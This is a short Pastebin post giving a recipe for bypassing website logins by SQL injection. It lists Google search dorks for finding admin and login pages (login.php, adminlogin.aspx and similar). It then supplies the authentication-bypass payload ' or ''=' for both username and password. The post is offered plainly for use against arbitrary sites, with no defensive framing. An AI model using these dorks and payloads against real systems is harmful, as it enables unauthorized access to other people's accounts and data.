Advertisement
zanutsec

How to Bypass login with SQL Injection

May 5th, 2016
420
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.34 KB | None | 0 0
  1. How to Bypass login with SQL Injection
  2.  
  3. We can use some dorks, like these:
  4. inurl:adminlogin.aspx
  5. inurl:admin/index.php
  6. inurl:administrator.php
  7. inurl:administrator.asp
  8. inurl:login.asp
  9. inurl:login.aspx
  10. inurl:login.php
  11. inurl:admin/index.php
  12. inurl:adminlogin.aspx
  13.  
  14. Username: ' or ''='
  15. Password: ' or ''='
  16.  
  17. Goodbye people!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement